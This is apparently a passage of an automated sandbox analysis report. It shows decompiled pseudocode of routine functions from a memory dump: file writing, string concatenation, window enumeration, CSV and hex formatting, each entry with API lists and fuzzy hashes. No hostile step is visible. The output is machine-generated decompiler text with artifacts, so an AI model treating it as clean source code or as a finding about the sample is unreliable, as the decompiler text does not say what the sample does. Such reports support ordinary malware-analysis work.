                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Item
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3888421826-0
                                                                                                                    • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                    • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                    • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                    • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                                    0x004072e0
                                                                                                                    0x004072f7
                                                                                                                    0x004072fd
                                                                                                                    0x00407316
                                                                                                                    0x00407342

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004072FD
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                    • strlen.MSVCRT ref: 00407328
                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2754987064-0
                                                                                                                    • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                    • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                    • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                    • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                                    0x00408dd0
                                                                                                                    0x00408dd2
                                                                                                                    0x00408de2
                                                                                                                    0x00408df4
                                                                                                                    0x00408e01
                                                                                                                    0x00408e1b
                                                                                                                    0x00408e21
                                                                                                                    0x00408e28
                                                                                                                    0x00408e30
                                                                                                                    0x00408dd4
                                                                                                                    0x00408dd8
                                                                                                                    0x00408dd8

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1386444988-0
                                                                                                                    • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                    • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                    • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                    • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                                                    0x004050e1
                                                                                                                    0x004050ec
                                                                                                                    0x004050ee
                                                                                                                    0x004050f5
                                                                                                                    0x004050ff
                                                                                                                    0x00405114
                                                                                                                    0x00405118
                                                                                                                    0x00405123
                                                                                                                    0x00405128
                                                                                                                    0x00405101
                                                                                                                    0x00405109
                                                                                                                    0x0040510f
                                                                                                                    0x0040512e

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcslen$wcscatwcsncat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 291873006-0
                                                                                                                    • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                    • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                    • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                    • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                                                    0x00402de0
                                                                                                                    0x00402de2
                                                                                                                    0x00402dec
                                                                                                                    0x00402def
                                                                                                                    0x00402dfb
                                                                                                                    0x00402e0c
                                                                                                                    0x00402e0e
                                                                                                                    0x00402e0e
                                                                                                                    0x00402e16
                                                                                                                    0x00402e18
                                                                                                                    0x00402e1a
                                                                                                                    0x00402e21

                                                                                                                    APIs
                                                                                                                    • GetClientRect.USER32 ref: 00402DEF
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                    • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                      • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                      • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$ClientPoints
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4235085887-0
                                                                                                                    • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                    • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                    • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                    • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 72%
                                                                                                                    			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                                                    0x0040b6a6
                                                                                                                    0x0040b6ad
                                                                                                                    0x0040b6af
                                                                                                                    0x0040b6b0
                                                                                                                    0x0040b6b5
                                                                                                                    0x0040b6b6
                                                                                                                    0x0040b6bd
                                                                                                                    0x0040b6bf
                                                                                                                    0x0040b6c0
                                                                                                                    0x0040b6c5
                                                                                                                    0x0040b6c6
                                                                                                                    0x0040b6cd
                                                                                                                    0x0040b6cf
                                                                                                                    0x0040b6d0
                                                                                                                    0x0040b6d5
                                                                                                                    0x0040b6d6
                                                                                                                    0x0040b6dd
                                                                                                                    0x0040b6df
                                                                                                                    0x0040b6e0
                                                                                                                    0x00000000
                                                                                                                    0x0040b6e5
                                                                                                                    0x0040b6e6

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??3@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 613200358-0
                                                                                                                    • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                    • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                    • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                    • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                                                    0x00407362
                                                                                                                    0x00407369
                                                                                                                    0x0040736e
                                                                                                                    0x00407371
                                                                                                                    0x00407378
                                                                                                                    0x0040737e
                                                                                                                    0x00407381
                                                                                                                    0x00407386
                                                                                                                    0x0040739f
                                                                                                                    0x00407388
                                                                                                                    0x00407391
                                                                                                                    0x00407391
                                                                                                                    0x004073a4
                                                                                                                    0x004073ac
                                                                                                                    0x004073ad
                                                                                                                    0x004073cd
                                                                                                                    0x004073d0
                                                                                                                    0x004073d3
                                                                                                                    0x004073d6
                                                                                                                    0x004073e0
                                                                                                                    0x004073e7
                                                                                                                    0x004073ee
                                                                                                                    0x004073f5
                                                                                                                    0x0040741a
                                                                                                                    0x0040741a
                                                                                                                    0x0040741d
                                                                                                                    0x00407420
                                                                                                                    0x00407423
                                                                                                                    0x00407426
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004073fc
                                                                                                                    0x00407400
                                                                                                                    0x0040740f
                                                                                                                    0x00407412
                                                                                                                    0x00407412
                                                                                                                    0x00407402
                                                                                                                    0x00407402
                                                                                                                    0x00407407
                                                                                                                    0x00407407
                                                                                                                    0x00407413
                                                                                                                    0x00407419
                                                                                                                    0x00407419
                                                                                                                    0x00407419
                                                                                                                    0x0040742f
                                                                                                                    0x00407434
                                                                                                                    0x00407437
                                                                                                                    0x00407439
                                                                                                                    0x0040743b
                                                                                                                    0x0040743b
                                                                                                                    0x0040744e
                                                                                                                    0x00407453
                                                                                                                    0x00407453
                                                                                                                    0x004073af
                                                                                                                    0x004073b2
                                                                                                                    0x004073ba
                                                                                                                    0x004073bb
                                                                                                                    0x00000000
                                                                                                                    0x004073bd
                                                                                                                    0x004073c3
                                                                                                                    0x004073c3
                                                                                                                    0x004073bb
                                                                                                                    0x0040745c
                                                                                                                    0x00407468
                                                                                                                    0x00407468
                                                                                                                    0x0040746d
                                                                                                                    0x00407473
                                                                                                                    0x0040747c
                                                                                                                    0x0040748e

                                                                                                                    APIs
                                                                                                                    • wcschr.MSVCRT ref: 004073A4
                                                                                                                    • wcschr.MSVCRT ref: 004073B2
                                                                                                                      • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                      • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                    • String ID: "
                                                                                                                    • API String ID: 1983396471-123907689
                                                                                                                    • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                    • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                    • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                    • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 45%
                                                                                                                    			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                                                    0x00401676
                                                                                                                    0x0040167e
                                                                                                                    0x0040168a
                                                                                                                    0x0040168c
                                                                                                                    0x00401690
                                                                                                                    0x00401691
                                                                                                                    0x00401696
                                                                                                                    0x0040169d
                                                                                                                    0x004016a2
                                                                                                                    0x004016aa
                                                                                                                    0x004016aa
                                                                                                                    0x004016aa
                                                                                                                    0x004016ad
                                                                                                                    0x004016ae
                                                                                                                    0x004016b3
                                                                                                                    0x004016b9
                                                                                                                    0x004016bb
                                                                                                                    0x004016bc
                                                                                                                    0x004016c1
                                                                                                                    0x004016c8
                                                                                                                    0x004016cd
                                                                                                                    0x004016ce
                                                                                                                    0x004016ea
                                                                                                                    0x004016ff
                                                                                                                    0x0040170c
                                                                                                                    0x004016d0
                                                                                                                    0x004016e3
                                                                                                                    0x004016e3
                                                                                                                    0x00401711
                                                                                                                    0x00401714
                                                                                                                    0x00000000
                                                                                                                    0x00401719
                                                                                                                    0x0040171c

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf
                                                                                                                    • String ID: Line%d$Lines
                                                                                                                    • API String ID: 3988819677-2790224864
                                                                                                                    • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                    • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                    • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                    • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 70%
                                                                                                                    			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                                    0x00405132
                                                                                                                    0x00405135
                                                                                                                    0x00405139
                                                                                                                    0x0040513e
                                                                                                                    0x00405141
                                                                                                                    0x004051b3
                                                                                                                    0x00405143
                                                                                                                    0x00405145
                                                                                                                    0x00405147
                                                                                                                    0x0040514c
                                                                                                                    0x0040514e
                                                                                                                    0x00405151
                                                                                                                    0x00405151
                                                                                                                    0x0040515b
                                                                                                                    0x0040515c
                                                                                                                    0x0040515d
                                                                                                                    0x0040515e
                                                                                                                    0x0040515f
                                                                                                                    0x00405168
                                                                                                                    0x00405169
                                                                                                                    0x00405171
                                                                                                                    0x00405173
                                                                                                                    0x00405174
                                                                                                                    0x00405182
                                                                                                                    0x00405184
                                                                                                                    0x00405189
                                                                                                                    0x0040518c
                                                                                                                    0x00405194
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405196
                                                                                                                    0x0040519a
                                                                                                                    0x0040519b
                                                                                                                    0x004051a1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004051a1
                                                                                                                    0x004051a3
                                                                                                                    0x004051a3
                                                                                                                    0x004051a6
                                                                                                                    0x004051af
                                                                                                                    0x004051b0
                                                                                                                    0x004051b7

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                    • String ID: %2.2X
                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                    • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                    • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                    • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                    • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 43%
                                                                                                                    			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                                                    0x004075bb
                                                                                                                    0x004075c2
                                                                                                                    0x004075c7
                                                                                                                    0x004075ca
                                                                                                                    0x004075cd
                                                                                                                    0x004075d8
                                                                                                                    0x004075e9
                                                                                                                    0x004075fc
                                                                                                                    0x00407600
                                                                                                                    0x00407601
                                                                                                                    0x00407606
                                                                                                                    0x00407609
                                                                                                                    0x0040760e
                                                                                                                    0x00407619
                                                                                                                    0x0040761e
                                                                                                                    0x0040761f
                                                                                                                    0x00407624
                                                                                                                    0x00407636

                                                                                                                    APIs
